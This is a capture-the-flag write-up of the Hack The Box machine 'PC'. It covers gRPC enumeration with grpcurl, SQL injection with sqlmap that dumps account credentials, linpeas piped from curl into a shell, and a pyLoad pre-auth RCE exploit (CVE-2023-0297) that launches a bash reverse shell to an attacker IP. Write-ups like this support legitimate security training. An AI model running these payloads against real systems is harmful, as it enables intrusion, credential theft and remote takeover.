Hack The Box | PC | Write Up

Hey there, Cyber Warriors! 🚀

Cracking the code, stepping into the mind of the creator, and uncovering secrets no one else has discovered yet — this is the thrill of Capture The Flag (CTF) challenges, and today I’ll take you on a fascinating journey through one of the most compelling tasks in Hack The Box: ‘PC’. This isn’t your typical challenge; ‘PC’ takes you to new heights, pushing you to explore not only the common low ports but also the less-traveled terrain of high ports.

The first step we will do is perform a new scan with NMAP to discover which kind of ports and services could be running into the objetive:

sudo nmap -sT -n -Pn -sV -T4 -v 10.10.11.214

The result of the scan we have performed is weird because we just discovered one port open:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

To gather more information about this machine, we will perform a new scan but over all possible ports:

sudo nmap -sT -n -Pn -sV -p- -v 10.10.11.214

Now, we have discovered a new port “50051”:

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
50051/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port50051-TCP:V=7.93%I=7%D=5/31%Time=64767908%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\x0
SF:6\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(Generic
SF:Lines,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\
SF:x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(GetRe
SF:quest,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\
SF:x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(HTTPO
SF:ptions,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\0
SF:\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(RTSP
SF:Request,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\
SF:0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(RPC
SF:Check,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\
SF:x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(DNSVe
SF:rsionBindReqTCP,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0\\?\\
SF:xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\0\\0
SF:")%r(DNSStatusRequestTCP,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0
SF:\\x05\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\
SF:0\\0\\?\\0\\0")%r(Help,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x05\\0
SF:\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0\\?\\
SF:0\\0")%r(SSLSessionReq,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff\\xff\\0\\x0
SF:5\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\0\\0\\0\\0\\0
SF:\\?\\0\\0")%r(TerminalServerCookie,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xf
SF:f\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0
SF:\\0\\0\\0\\0\\0\\?\\0\\0")%r(TLSSessionReq,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?
SF:\\xff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x0
SF:8\\0\\0\\0\\0\\0\\0\\?\\0\\0")%r(Kerberos,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\x
SF:ff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\
SF:0\\0\\0\\0\\0\\0\\?\\0\\0")%r(SMBProgNeg,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\x
SF:ff\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\
SF:0\\0\\0\\0\\0\\0\\?\\0\\0")%r(X11Probe,2E,"\\0\\0\\x18\\x04\\0\\0\\0\\0\\0\\0\\x04\\0\\?\\xff
SF:\\xff\\0\\x05\\0\\?\\xff\\xff\\0\\x06\\0\\0\\x20\\0\\xfe\\x03\\0\\0\\0\\x01\\0\\0\\x04\\x08\\0\\
SF:0\\0\\0\\0\\0\\?\\0\\0");

We need to search some information about the port and we can say this port is usually used for gRPC service.

What is gRPC?

gRPC (Google Remote Procedure Call) is an open-source high-performance RPC
(Remote Procedure Call) framework developed by Google. It can run in any 
environment and allows for communication between services in a variety of 
ways. Its use of HTTP/2 for transport and Protocol Buffers for message 
serialization allows for fast, efficient communication between client and
server.

After searching more information about how we can interact with this service I found this article by Microsoft:

https://learn.microsoft.com/en-us/aspnet/core/grpc/test-tools?view=aspnetcore-7.0

The article shows how we can use different tools to interact with the gRPC service. In my case I selected “grpcul” tool. We can find more information in GitHub (https://github.com/fullstorydev/grpcurl). Now we can download the tool in our Kali Linux through the next link:

https://github.com/fullstorydev/grpcurl/releases

Let’s try to discover more information with grpcurl:

./grpcurl 10.10.11.214:50051 describe
Failed to dial target host "10.10.11.214:50051": tls: first record does not look like a TLS handshake

We need to force the plain text connection with grpcurl:

./grpcurl -plaintext 10.10.11.214:50051 describe
SimpleApp is a service:
service SimpleApp {
  rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );
  rpc RegisterUser ( .RegisterUserRequest ) returns ( .RegisterUserResponse );
  rpc getInfo ( .getInfoRequest ) returns ( .getInfoResponse );
}
grpc.reflection.v1alpha.ServerReflection is a service:
service ServerReflection {
  rpc ServerReflectionInfo ( stream .grpc.reflection.v1alpha.ServerReflectionRequest ) returns ( stream .grpc.reflection.v1alpha.ServerReflectionResponse );
}

We discovered new information. We can see that the server has an application running named “SimpleApp” and we can interact through different methods. Now, we will see which kind of data we need to send through each method:

  • LoginUser: Method for login into the application with “username” and “password” params.
./grpcurl -plaintext 10.10.11.214:50051 describe LoginUserRequest
LoginUserRequest is a message:
message LoginUserRequest {
  string username = 1;
  string password = 2;
}
  • RegisterUser: Method for register user into the application with “username” and “password” params.
./grpcurl -plaintext 10.10.11.214:50051 describe RegisterUserRequest
RegisterUserRequest is a message:
message RegisterUserRequest {
  string username = 1;
  string password = 2;
}
  • GetInfo: Method for get information about some user with “id” param.
./grpcurl -plaintext 10.10.11.214:50051 describe getInfoRequest
getInfoRequest is a message:
message getInfoRequest {
  string id = 1;
}

In this point we can check the “getInfo” method with an example “id” to know some more information:

./grpcurl -d '{"id":"1"}' -plaintext 10.10.11.214:50051 SimpleApp/getInfo

We will receive some error from the application, might be we will need some authentication token:

{
  "message": "Authorization Error.Missing 'token' header"
}

We will try to create a new user. It could be a solution to check information about other users into the application or just to log into it:

./grpcurl -d '{"username":"example", "password":"example"}' -vv -plaintext 10.10.11.214:50051 SimpleApp/RegisterUser
Resolved method descriptor:
rpc RegisterUser ( .RegisterUserRequest ) returns ( .RegisterUserResponse );

Request metadata to send:
(empty)

Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

Estimated response size: 35 bytes

Response contents:
{
  "message": "Account created for user example!"
}

Response trailers received:
(empty)
Sent 1 request and received 1 response

After creating our new user we will try to connect to this application to get more information about our new user:

./grpcurl -d '{"username":"example", "password":"example"}' -vv -plaintext 10.10.11.214:50051 SimpleApp/LoginUser

Apparently we can log in with the new user we have created and after logging in with new user we will receive important information like the token to use the method “getInfo”:

Resolved method descriptor:
rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );

Request metadata to send:
(empty)

Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

Estimated response size: 17 bytes

Response contents:
{
  "message": "Your id is 706."
}

Response trailers received:
token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg'
Sent 1 request and received 1 response

Now, we can get more information through the “getInfo” method:

./grpcurl -d '{"id":"706"}' -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg' -vv -plaintext 10.10.11.214:50051 SimpleApp/getInfo

But something happened and we will receive the next message from the application:

Resolved method descriptor:
rpc getInfo ( .getInfoRequest ) returns ( .getInfoResponse );

Request metadata to send:
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg

Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

Estimated response size: 19 bytes

Response contents:
{
  "message": "Will update soon."
}

Response trailers received:
(empty)
Sent 1 request and received 1 response

But if we try with the “ID” 1 we will see this message:

./grpcurl -d '{"id":"1"}' -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg' -plaintext 10.10.11.214:50051 SimpleApp/getInfo
{
  "message": "The admin is working hard to fix the issues."
}

In this point we will try to check the service with another tool. We will use “grpcui”. This tools provide us one way to interact with “gRPC” service but with user interface. We can download it through GitHub “https://github.com/fullstorydev/grpcui/releases”. After download the tool, we will create a new session to can interact with “gRPC”:

./grpcui -plaintext 10.10.11.214:50051

After execute the command we will see the grpcui user interface to interact with the “gRPC” service. The next point is try to capture the “getInfo” request to modify our petition and finally try to inject something:

Once we have completed our request, the next step is redirect it to burp suite with the navigator plugin “Foxy Proxy”. Before use it we need to configure our proxy into the configuration plugin:

Now we already have the request in our burp suite and we will try some sql injection. Why? because if you do your own research about this service is usually vulnerable a sql injection:

Now we going to send our request to the functionality “Repeater” to save this request as file:

Now we have our request already saved:

Now we will perform a scan with sqlmap to try found some sql injection:

sudo sqlmap -r pc.req

After performing our scan we will see that the application is vulnerable to SQL Injection through the param “id”:

Parameter: JSON id ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg"}],"data":[{"id":"1 AND 8736=8736"}]}

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg"}],"data":[{"id":"1 AND 4960=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))"}]}

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg"}],"data":[{"id":"-4905 UNION ALL SELECT CHAR(113,122,122,113,113)||CHAR(81,101,109,108,117,118,88,107,120,77,88,108,82,76,75,89,112,66,109,71,83,74,119,104,100,110,110,74,74,77,78,122,78,86,122,80,111,81,104,105)||CHAR(113,98,98,106,113)-- hDmD"}]}

Now, we already known that the application is vulnerable and we going to enumerate the tables of this database:

sudo sqlmap -r pc.req -T SQLite --tables

We will receive two tables:

[13:16:57] [INFO] fetching tables for database: 'SQLite_masterdb'
<current>
[2 tables]
+----------+
| accounts |
| messages |
+----------+

We found the accounts tables. We can dump the accounts information with “sqlmap” too:

sudo sqlmap -r pc.req -T SQLite -T accounts --dump

We will receive user and password we can use it with SSH:

Database: <current>
Table: accounts
[2 entries]
+------------------------+----------+
| password               | username |
+------------------------+----------+
| admin                  | admin    |
| REPLACED               | REPLACED |
+------------------------+----------+

Now we can check if we can connect through SSH with the credentials we already have discovered:

└─$ ssh sau@10.10.11.214

Finally, we can reach the user flag:

Now we will enumerate this machine with Linpeas but first we will turn on our http server to transfer the script into the machine:

sudo python3 -m http.server 80

Now, we can execute the next command to execute linpeas in memory:

curl <http://10.10.16.64/linpeas.sh> | sh >> linpeas.log

We can see the next processes running in the server:

╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: <https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes>                                                                                                  
root         486  0.0  0.0   2488   512 ?        S    05:36   0:00  _ bpfilter_umh                                                                                                                                           
root           1  0.0  0.2 167996 11532 ?        Ss   05:36   0:02 /sbin/init
root         464  0.3  2.0 163632 80964 ?        S<s  05:36   0:25 /lib/systemd/systemd-journald
root         514  0.0  0.1  20176  5864 ?        Ss   05:36   0:00 /lib/systemd/systemd-udevd
systemd+     534  0.0  0.1  19080  7608 ?        Ss   05:36   0:00 /lib/systemd/systemd-networkd
  └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
root         679  0.0  0.4 280192 18004 ?        SLsl 05:36   0:00 /sbin/multipathd -d -s
root         707  0.0  0.0  11356  1680 ?        S<sl 05:36   0:00 /sbin/auditd
root         738  0.0  0.2  49296 10444 ?        Ss   05:36   0:00 /usr/bin/VGAuthService
root         739  0.1  0.2 239496  8092 ?        Ssl  05:36   0:10 /usr/bin/vmtoolsd
root         770  0.0  0.1  99900  5980 ?        Ssl  05:36   0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root         819  0.0  0.2 241052  9180 ?        Ssl  05:36   0:03 /usr/lib/accountsservice/accounts-daemon
message+     820  0.0  0.1   7572  4436 ?        Ss   05:36   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  └─(Caps) 0x0000000020000000=cap_audit_write
root         833  0.0  0.0  81956  3648 ?        Ssl  05:36   0:00 /usr/sbin/irqbalance --foreground
root         834  0.0  0.4  29876 18312 ?        Ss   05:36   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         835  0.0  0.2 236440  9040 ?        Ssl  05:36   0:00 /usr/lib/policykit-1/polkitd --no-debug
syslog       836  0.2  0.1 224344  5352 ?        Ssl  05:36   0:16 /usr/sbin/rsyslogd -n -iNONE
root         838  0.0  1.0 875264 41940 ?        Ssl  05:36   0:01 /usr/lib/snapd/snapd
root         839  0.0  0.1  17492  7760 ?        Ss   05:36   0:00 /lib/systemd/systemd-logind
root         841  0.0  0.3 395492 13836 ?        Ssl  05:36   0:00 /usr/lib/udisks2/udisksd
root         886  0.0  0.3 318824 13412 ?        Ssl  05:36   0:00 /usr/sbin/ModemManager
root        1054  0.4  0.7 634840 31420 ?        Ssl  05:36   0:35 /usr/bin/python3 /opt/app/app.py
root        1060  0.0  1.5 1221072 62468 ?       Ssl  05:36   0:06 /usr/bin/python3 /usr/local/bin/pyload
root        1073  0.0  0.0   8540  2940 ?        Ss   05:36   0:00 /usr/sbin/cron -f
daemon[0m      1077  0.0  0.0   3796  2276 ?        Ss   05:36   0:00 /usr/sbin/atd -f
root        1082  0.0  0.0   5828  1984 tty1     Ss+  05:36   0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
sau         1714  0.0  0.1  13960  6088 ?        S    06:11   0:00  |   _ sshd: sau@pts/1
sau         1715  0.0  0.1   9988  5012 pts/1    Ss+  06:11   0:00  |       _ -bash
sau         2196  0.0  0.1  13964  5304 ?        S    07:39   0:00      _ sshd: sau@pts/0
sau         2197  0.0  0.1   9988  4936 pts/0    Ss   07:39   0:00          _ -bash
sau         2224  0.0  0.2  26536 10856 pts/0    S+   07:45   0:00              _ curl <http://10.10.16.64/linpeas.sh>
sau         2225  0.4  0.0   3532  2728 pts/0    S+   07:45   0:00              _ sh
sau         5451  0.0  0.0   3532  1020 pts/0    S+   07:46   0:00                  _ sh
sau         5455  0.0  0.0  10952  3616 pts/0    R+   07:46   0:00                  |   _ ps fauxwww
sau         5454  0.0  0.0   3532  1020 pts/0    S+   07:46   0:00                  _ sh
systemd+    1279  0.0  0.3  24448 12172 ?        Ss   05:42   0:00 /lib/systemd/systemd-resolved
sau         1356  0.0  0.2  19104  9844 ?        Ss   05:43   0:00 /lib/systemd/systemd --user
sau         1359  0.0  0.0 169352  3388 ?        S    05:43   0:00  _ (sd-pam)
sau         5342  0.0  0.1   7108  4088 ?        Ss   07:45   0:00  _ /usr/bin/dbus-daemon[0m --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only

We can see some listen ports:

╔══════════╣ Active Ports
╚ <https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports>                                                                                                                                                
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                                                                                                                                            
tcp        0      0 0.0.0.0:9666            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::50051                :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -

In this point we will try to reach the port 8000 to see which kind of service is running:

sau@pc:~$ curl <http://127.0.0.1:8000>

We can see it is some kind of application web and we can follow the next “url”:

<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F">/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F</a>. If not, click the link.

We can check the next URL:

sau@pc:~$ curl <http://127.0.0.1:8000/login>

We will find login for PyLoad. After this we will search more information in google and we will find this post to exploit RCE in this service:

https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad

Also an exploit code:

sau@pc:~$ curl -i -s -k -X $'POST' \\
    --data-binary $'jk=pyimport%20os;os.system(\\"touch%20/tmp/pwnd\\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \\
    $'http://<target>/flash/addcrypted2'

We will try to execute a reverse shell through this exploit. First of all we can use https://www.revshells.com. I have selected this reverse shell:

#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.16.64/9000 0>&1

Add execution permission:

sau@pc:~$ chmod +x rv.sh

After creating our reverse shell we will need to turn on our netcat server:

sudo nc -nlvp 9000

Now, we can modify the exploit code to execute our reverse shell (execute into the session SSH):

sau@pc:~$ curl -i -s -k -X $'POST' \\
    --data-binary $'jk=pyimport%20os;os.system(\\"bash%20/tmp/rv.sh\\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \\
    $'<http://localhost:8000/flash/addcrypted2>'

Finally, we have obtained our connection with root privileges:

The next step is obtain the root flag!

In closing, I would like to emphasize that the realm of cyber security is a constantly evolving landscape. As we venture through this dynamic world, it’s important to continue learning and adapting. Each Capture The Flag challenge, each line of code, each high port we encounter serves as a reminder that there’s always more to learn.

Remember, enumeration isn’t just about counting; it’s about understanding, getting into the minutiae of systems, and revealing hidden vulnerabilities. It’s through meticulous probing and exploration that we truly get to the heart of the system. Injections aren’t merely exploits, but valuable lessons in recognizing and mitigating risks.

In our journey to secure cyberspace, it’s our curiosity and persistence that drive us forward. It’s about asking the right questions, cracking the code, and leaving no stone unturned. As we step into tomorrow, let’s continue to challenge assumptions, elevate our knowledge, and shape the future of cyber security.

Remember, the greatest weapon in the world of cyber security is knowledge. Stay curious, stay vigilant, and most importantly, never stop learning.

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cĂłmo se procesan los datos de tus comentarios.